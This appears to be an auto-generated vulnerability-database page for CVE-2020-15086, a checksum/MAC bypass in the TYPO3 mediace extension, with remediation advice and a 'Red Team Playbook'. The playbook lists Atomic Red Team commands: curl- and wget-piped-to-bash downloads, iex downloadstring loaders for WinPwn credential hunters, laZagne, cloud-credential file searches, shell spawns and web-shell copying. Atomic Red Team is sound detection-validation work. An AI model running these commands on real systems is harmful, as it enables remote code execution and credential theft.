CVE-2020-15086
Overview
This vulnerability is a cryptographic message authentication code (MAC) bypass in the FriendsOfTYPO3 mediace extension, caused by an internal verification mechanism that permits generation of arbitrary checksums. The flaw affects the checksum validation logic within the mediace extension for TYPO3, enabling injection of data with forged valid MACs. The affected component is the checksum verification process in versions from 7.6.2 up to but not including 7.6.5.
Vulnerability Description
In TYPO3 installations with the "mediace" extension from version 7.6.2 and before version 7.6.5, it has been discovered that an internal verification mechanism can be used to generate arbitrary checksums. The allows to inject arbitrary data having a valid cryptographic message authentication code and can lead to remote code execution. To successfully exploit this vulnerability, an attacker must have access to at least one `Extbase` plugin or module action in a TYPO3 installation. This is fixed in version 7.6.5 of the "mediace" extension for TYPO3.
Impact
An unauthenticated remote attacker with access to an Extbase plugin or module action can exploit this flaw to inject arbitrary data authenticated by a forged MAC, leading to remote code execution. This enables full compromise of the TYPO3 installation, including potential data breach and service disruption. The vulnerability requires no privileges or user interaction (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward in accessible environments.
Solution
Upgrade the FriendsOfTYPO3 mediace extension to version 7.6.5 or later, which addresses the checksum verification flaw. Detailed patch information and remediation steps are available in the official GitHub security advisory GHSA-4h44-w6fm-548g and the associated commit fa29ffd3e8b275782a8600d2406e1b1e5e16ae75. No alternative workarounds are documented; applying the update is required to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the "mediace" extension for TYPO3 installations arises from a flaw in its internal verification mechanism, which allows for the generation of arbitrary checksums. This weakness enables an attacker to inject malicious data that appears to be legitimate due to the valid cryptographic message authentication code (MAC) associated with it. The exploitation of this vulnerability can lead to remote code execution, a severe threat that allows attackers to execute arbitrary code on the server hosting the TYPO3 application. The issue is particularly critical because it affects versions of the extension from 7.6.2 to 7.6.5, and successful exploitation requires the attacker to have access to at least one Extbase plugin or module action within the TYPO3 environment.
Attack vectors for this vulnerability are primarily focused on exploiting the trust relationships within TYPO3's architecture. An attacker with access to an Extbase plugin can craft requests that manipulate the checksum verification process, allowing them to inject harmful payloads. For instance, an attacker could create a malicious plugin that, when executed, alters the behavior of the application or accesses sensitive data. Given that TYPO3 is often used for content management in enterprise environments, the potential for data breaches or service disruptions is significant. The ability to execute arbitrary code remotely means that attackers could take control of the server, deploy malware, or exfiltrate sensitive information.
The real-world impact of this vulnerability can be profound, especially for organizations relying on TYPO3 for their web presence. The business risks include data loss, reputational damage, and financial implications stemming from remediation efforts and potential regulatory fines if sensitive data is compromised. The severity of this vulnerability, reflected in its high CVSS score, indicates that organizations must prioritize addressing it to safeguard their systems. The potential for widespread exploitation in environments where TYPO3 is deployed makes this a critical issue for IT security teams.
To detect and mitigate this vulnerability, organizations should first ensure that they are running the latest version of the "mediace" extension, as the issue has been addressed in version 7.6.5. Regularly updating software components is a fundamental practice in cybersecurity that helps protect against known vulnerabilities. Additionally, implementing robust access controls can limit the ability of unauthorized users to access Extbase plugins or module actions, thereby reducing the attack surface. Monitoring for unusual activity within the TYPO3 environment can also aid in early detection of exploitation attempts. Employing web application firewalls (WAFs) can provide an additional layer of security by filtering out malicious requests before they reach the application.
In conclusion, the vulnerability in the "mediace" extension for TYPO3 poses a significant threat to organizations using this content management system. Understanding the technical details of the vulnerability, potential attack vectors, and the real-world implications is crucial for effective risk management. By adopting proactive detection and mitigation strategies, organizations can better protect themselves against the exploitation of this and similar vulnerabilities, ensuring the integrity and security of their web applications.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Typo3 | Mediace | All |
cpe:2.3:a:typo3:mediace:*:*:*:*:*:typo3:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-15086 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/FriendsOfTYPO3/mediace/security/advisories/GHSA-4h44-w6fm-548g |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/FriendsOfTYPO3/mediace/commit/fa29ffd3e8b275782a8600d2406e1b1e5e16ae75 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/FriendsOfTYPO3/mediace/pull/31 |